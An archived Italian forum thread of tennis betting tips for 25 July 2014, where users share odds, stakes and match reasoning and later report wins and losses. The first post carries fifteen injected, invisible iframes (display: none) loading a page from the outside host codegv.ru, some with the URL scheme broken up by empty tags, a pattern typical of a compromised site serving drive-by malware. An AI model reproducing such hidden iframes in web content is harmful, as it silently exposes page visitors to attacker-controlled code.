PDA

Visualizza versione completa : Pronostici Tennis 25 Luglio



Tonieland
25-07-2014, 00.16.26
Spunti per domani:

- la Eguchi contro la Jova ha una bella quota, sta facendo un bel torneo a Baku e ha battuto anche buone avversarie;

- Rosol a @4 (quota in calo) contro Cilic non si può vedere secondo me, il Ceco è veramente in forma questo mese mentre Cilic al rientro dopo Wimbledon ha un po' sofferto contro lo scarso Sijsling;

- la Fogna a @1.15 è da bancare sempre e comunque, oggi avrà davanti un giovane veramente tosto e che gioca in casa quale è Coric.


Come giocate per ora banco la Jova @1.46 fiducia medio-bassa, gli uomini me li gioco più in là.
<iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Ashe
25-07-2014, 10.29.09
Beck-Diarra 2 @6.5 stake 1
Beck-Diarra 2-1 @4.5 stake 0.5
Diarra vince primo set @5 stake 0.5

Beck ha faticato contro Albot mentre Diarra viene da due vittorie vs giocatori di livello superiore al suo come Przysiezny e Granollers G.
A quelle quote un tentativo ci sta. Anche vista la possibilità di seguire il match e di coprirsi in live.A sfavore di Diarra il fatto che è austriaco e che giocano in germania. Inoltre l'esperienza anche gioca a favore di Beck.Ci si prova a stake basso.

Takerozzo
25-07-2014, 10.30.55
Svitolina + Voegele @1.8 stk 3
Prendo questa accoppiata. Svitolina che qui deve difendere punti importanti dopo la vittoria dello scorso anno. Ieri con la Soler Espinosa ha giocato un ottimo match, sempre concentrata. La Voegele mi piace contro una Peer che sta concedendo molto soprattutto al servizio.

Bellucci @2.10 stk 2,5
A Gstaad invece prendo da underdog il Brasiliano. Monaco non sta giocando il suo miglior tennis, magari una sorpresa ci può stare.

Paolo Raimondi
25-07-2014, 10.47.00
Ho visto in questi giorni un bellissimo prospetto di giocatore...Coric. Ha appena vinto le sue due prime partite nel circuito maggiore, mostrando una personalità fuori dal comune. Tra l'altro Zeballos ieri non era un avversario proprio così tenero, perchè era a posto. Quota di Fognini troppo bassa a mio avviso.

divin codino 1000
25-07-2014, 11.09.39
Granollers @1.96 stk 5

Non che mi piaccia particolarmente come giocatore
e non che abbia un palla pesantissima, ma in altura tutti
gli anni fa molto bene, in queste due settimane a conclusione dell'estate
sul rosso prima di passare sul cemento americano ha sempre fatto bene
evidentemente si trova a suo agio sia qui che a Kitzbuhel, e vederlo a quote pari con Andujar
mi pare una buona occasione

Per il resto @1.16 come si fa a non bancare Fognini almeno pre match
poi vediamo...

Bruttos89
25-07-2014, 12.06.16
Youznhy - Haase 2-0 @2 vado all in su questo prono, Haase già si è salvato ieri contro un ragazzino, oggi prevedo un asfaltata, Youznhy di molto superiore a mio avviso

Piccolo_Toro_
25-07-2014, 13.31.45
Fognini - Coric 2-0 no @2,43 stake 3
I soliti passaggi a vuoto di Fognini potrebbero essere fatali contro Coric, giocatore in divenire e che giocando in casa può essere sicuramente concentrato molto più di Fabio che in alcuni momenti del match inizia a sparare palline fuori dal campo. Non credo che Coric perda 2-0 e la quota mi pare alta.

Otello
25-07-2014, 14.08.33
Andujar - Granollers

Derby spagnolo .....Andujar su terra ha come score quest'anno un 13 V e 10 L , i precedenti dicono 4-4 ma l'ultimo giocato proprio quest'anno in quel di Buenos Aires e' stato vinto da lui con un secco 6-3 6-0 ....miglior risultato stagionale in quel di Rio de Janeiro dove venne sconfitto in semifinale al terzo set da Nadala dopo un tie break allucinante dove ha perso per 12-10 , dopo che nel primo set gli aveva rifilato un secco 6-2....Qui in Svizzera ha usufruito del ritiro al primo turno di Simon , dopo aver vinto il primo set per 6-2 , mentre nel secondo et ha regolato senza patemi il buon terraiolo ROLA con un secco 6-3 6-3 senza affanni particolari.....Granollers dal canto suo quest'anno non attraversa un buon momento e il suo score parla chiaro 10 V e 13 L , miglior risultato stagionale la finale persa a Casablanca in 3 set contro il connazionale Garcia Lopez ; Andujar forse al servizio si fa preferire e nel dritto puo far male al suo avversario che non ha nella potenza le sue doti migliori , forse Granollers e' piu intelligente tatticamente ma credo che se lo scambio non si allunga piu di tanto potrebbe soffrire l'uno due di Andujar ..... Vado con il giocatoe che reputo attualmente piu in forma.....(Mi dispiace andare contro l'amico Divin.....:doh:)

Andujar @ 1.88
Stake ALTO

divin codino 1000
25-07-2014, 14.26.32
Andujar - Granollers

Derby spagnolo .....Andujar su terra ha come score quest'anno un 13 V e 10 L , i precedenti dicono 4-4 ma l'ultimo giocato proprio quest'anno in quel di Buenos Aires e' stato vinto da lui con un secco 6-3 6-0 ....miglior risultato stagionale in quel di Rio de Janeiro dove venne sconfitto in semifinale al terzo set da Nadala dopo un tie break allucinante dove ha perso per 12-10 , dopo che nel primo set gli aveva rifilato un secco 6-2....Qui in Svizzera ha usufruito del ritiro al primo turno di Simon , dopo aver vinto il primo set per 6-2 , mentre nel secondo et ha regolato senza patemi il buon terraiolo ROLA con un secco 6-3 6-3 senza affanni particolari.....Granollers dal canto suo quest'anno non attraversa un buon momento e il suo score parla chiaro 10 V e 13 L , miglior risultato stagionale la finale persa a Casablanca in 3 set contro il connazionale Garcia Lopez ; Andujar forse al servizio si fa preferire e nel dritto puo far male al suo avversario che non ha nella potenza le sue doti migliori , forse Granollers e' piu intelligente tatticamente ma credo che se lo scambio non si allunga piu di tanto potrebbe soffrire l'uno due di Andujar ..... Vado con il giocatoe che reputo attualmente piu in forma.....(Mi dispiace andare contro l'amico Divin.....:doh:)

Andujar @ 1.88
Stake ALTO

Tranquillo non accadrà più....
:473567_3e62:

Takerozzo
25-07-2014, 15.17.12
Svitolina + Voegele @1.8 stk 3
Prendo questa accoppiata. Svitolina che qui deve difendere punti importanti dopo la vittoria dello scorso anno. Ieri con la Soler Espinosa ha giocato un ottimo match, sempre concentrata. La Voegele mi piace contro una Peer che sta concedendo molto soprattutto al servizio.

Bellucci @2.10 stk 2,5
A Gstaad invece prendo da underdog il Brasiliano. Monaco non sta giocando il suo miglior tennis, magari una sorpresa ci può stare.

Le donzelle non deludono, su Bellucci non mi esprimo neanche.

zoomom
25-07-2014, 15.28.20
Ciao a tutti. Provo Troicki perché mi sembra in forma e con la voglia di vincere ed anche perché Verdasco non mi sembra neanche l'ombra del giocatore di una volta.

Troicki 2.45 stake alto:redface:

Otello
25-07-2014, 17.22.36
Andujar - Granollers

Derby spagnolo .....Andujar su terra ha come score quest'anno un 13 V e 10 L , i precedenti dicono 4-4 ma l'ultimo giocato proprio quest'anno in quel di Buenos Aires e' stato vinto da lui con un secco 6-3 6-0 ....miglior risultato stagionale in quel di Rio de Janeiro dove venne sconfitto in semifinale al terzo set da Nadala dopo un tie break allucinante dove ha perso per 12-10 , dopo che nel primo set gli aveva rifilato un secco 6-2....Qui in Svizzera ha usufruito del ritiro al primo turno di Simon , dopo aver vinto il primo set per 6-2 , mentre nel secondo et ha regolato senza patemi il buon terraiolo ROLA con un secco 6-3 6-3 senza affanni particolari.....Granollers dal canto suo quest'anno non attraversa un buon momento e il suo score parla chiaro 10 V e 13 L , miglior risultato stagionale la finale persa a Casablanca in 3 set contro il connazionale Garcia Lopez ; Andujar forse al servizio si fa preferire e nel dritto puo far male al suo avversario che non ha nella potenza le sue doti migliori , forse Granollers e' piu intelligente tatticamente ma credo che se lo scambio non si allunga piu di tanto potrebbe soffrire l'uno due di Andujar ..... Vado con il giocatoe che reputo attualmente piu in forma.....(Mi dispiace andare contro l'amico Divin.....:doh:)

Andujar @ 1.88
Stake ALTO


Pablo.....Pabloooooooooooooo :up: :up: :up:

Paolo Raimondi
25-07-2014, 17.47.23
Ottima lettura, ha dominato

Ashe
25-07-2014, 21.05.39
Beck-Diarra 2 @6.5 stake 1 Beck-Diarra 2-1 @4.5 stake 0.5 Diarra vince primo set @5 stake 0.5 Beck ha faticato contro Albot mentre Diarra viene da due vittorie vs giocatori di livello superiore al suo come Przysiezny e Granollers G. A quelle quote un tentativo ci sta. Anche vista la possibilità di seguire il match e di coprirsi in live.A sfavore di Diarra il fatto che è austriaco e che giocano in germania. Inoltre l'esperienza anche gioca a favore di Beck.Ci si prova a stake basso. Nada. Servizio e dritto di Diarra inesistenti oggi. -2

Paolo Raimondi
25-07-2014, 22.55.00
Peccato per la mia bet, ma Coric ha stoffa. Lui e Zverev sono "la meglio gioventù"

zoomom
26-07-2014, 08.28.25
ciao a tutti. Provo troicki perché mi sembra in forma e con la voglia di vincere ed anche perché verdasco non mi sembra neanche l'ombra del giocatore di una volta.

Troicki 2.45 stake alto:redface:


schifioooooo:18:

Piccolo_Toro_
26-07-2014, 15.47.16
Fognini - Coric 2-0 no @2,43 stake 3
I soliti passaggi a vuoto di Fognini potrebbero essere fatali contro Coric, giocatore in divenire e che giocando in casa può essere sicuramente concentrato molto più di Fabio che in alcuni momenti del match inizia a sparare palline fuori dal campo. Non credo che Coric perda 2-0 e la quota mi pare alta.
​+4,29